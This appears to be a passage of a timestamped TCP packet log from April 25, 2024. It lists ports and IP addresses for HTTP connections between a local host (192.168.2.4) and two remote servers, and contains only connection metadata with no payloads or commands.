Apr 25, 2024 09:03:58.366370916 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.366378069 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.366388083 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.366432905 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.366458893 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.366476059 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.366508007 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.366523027 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.366547108 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.366564035 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.366594076 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.366605043 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.366666079 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.366686106 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.366702080 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.366718054 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.366750956 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.366822004 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.366871119 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.366916895 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.366933107 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.366980076 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.366983891 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.367017031 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.367059946 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.573966980 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.573995113 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.574011087 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.574027061 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.574053049 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.574070930 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.574079037 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.574136019 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.574182034 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.574199915 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.574260950 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.574276924 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.574306965 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.574325085 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.574361086 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.574369907 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.574405909 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.574451923 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.574455023 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.574470997 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.574512005 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.574531078 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.574552059 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.574584007 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.574595928 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.574599981 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.574651957 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.574678898 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.574696064 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.574713945 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.574729919 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.574738026 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.574768066 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.574803114 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.574819088 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.574856997 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.574882030 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.574958086 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575000048 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575004101 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.575016975 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575052023 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575059891 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.575079918 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575114012 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575122118 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.575151920 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575186968 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575195074 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.575202942 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575244904 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.575256109 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575313091 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575346947 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575362921 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.575411081 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575426102 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575442076 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575454950 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.575483084 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.575495958 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575514078 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575545073 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575556993 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.575603008 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575649023 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.575690031 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575731039 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575767994 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575778008 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.575784922 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575800896 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575830936 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.575855017 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575870991 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575901985 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.575927019 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575946093 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575962067 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.575972080 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.575999022 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.576020002 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576035976 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576075077 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.576078892 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576158047 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576175928 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576195002 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576205969 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.576217890 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576232910 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.576253891 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576296091 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576299906 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.576356888 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576375008 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576390028 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576405048 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.576426983 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.576435089 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576450109 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576492071 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.576497078 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576538086 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576555967 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576571941 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576591969 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.576610088 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.576621056 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576667070 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576699972 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576710939 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.576716900 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576747894 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576757908 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.576781988 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576817989 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.576858997 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576875925 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.576916933 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.692126036 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 25, 2024 09:03:58.781985998 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782047987 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782069921 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782092094 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782110929 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782140970 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782161951 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782174110 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.782181025 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782213926 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782234907 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782234907 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.782234907 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.782234907 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.782255888 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782284021 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.782330036 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782368898 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782387972 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.782407045 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782459974 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782460928 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.782512903 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782535076 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782553911 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782558918 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.782587051 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782603979 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.782608032 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782659054 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.782664061 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782701015 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782751083 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.782757044 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782805920 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782835960 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782854080 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782860041 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.782898903 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.782943010 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782962084 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.782980919 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.783006907 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.783010006 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.783056974 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.783056974 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.783077002 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.783128977 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.783148050 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.783211946 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.783262014 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.783273935 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.783293962 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.783313036 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.783340931 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.783349991 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.783404112 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.783413887 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.783474922 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.783504009 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.783524990 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.783550978 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.783591986 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.783597946 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.783618927 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.783657074 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.783674955 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.783696890 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.783735037 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.783751965 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.783775091 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.783824921 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.783824921 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.783863068 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.783900023 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.783910990 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.783936977 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.783984900 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.784002066 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.784023046 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.784043074 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.784070969 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.784086943 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.784136057 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.784147978 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.784183979 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.784230947 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.784390926 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.784411907 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.784455061 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.784471035 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.784519911 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.784568071 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.784581900 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.784631014 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.784681082 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.784761906 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.784775972 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.784789085 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.784826994 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.784868002 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:59.868227005 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.106755972 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.106829882 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.106939077 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.345383883 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.345608950 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.345675945 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.345688105 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.345750093 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.345772982 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.345786095 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.345797062 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.345813990 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.345829010 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.345851898 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.345890045 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.345917940 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.345930099 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.345931053 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.345972061 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.588290930 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.588308096 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.588318110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.588330030 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.588349104 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.588361025 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.588372946 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.588383913 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.588393927 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.588396072 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.588406086 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.588416100 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.588426113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.588428020 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.588435888 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.588447094 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.588458061 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.588470936 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.588480949 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.588490963 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.588499069 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.588501930 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.588510990 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.588525057 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.588531971 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.588574886 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.826939106 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.826960087 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.826972008 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.827047110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.827049971 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.827130079 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.827220917 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.827374935 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.827419043 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.827466011 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.827486992 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.827539921 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.827547073 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.827604055 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.827691078 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.827702999 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.827717066 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.827745914 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.827766895 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.827779055 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.827822924 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.827867031 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.827899933 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.827912092 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.827969074 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.828094959 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.828115940 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.828139067 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.828183889 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.828227043 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.828238964 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.828253031 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.828269005 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.828313112 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.828340054 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.828351974 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.828392982 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.828421116 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.828484058 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.828536987 CEST	49733	80	192.168.2.4	176.97.76.106
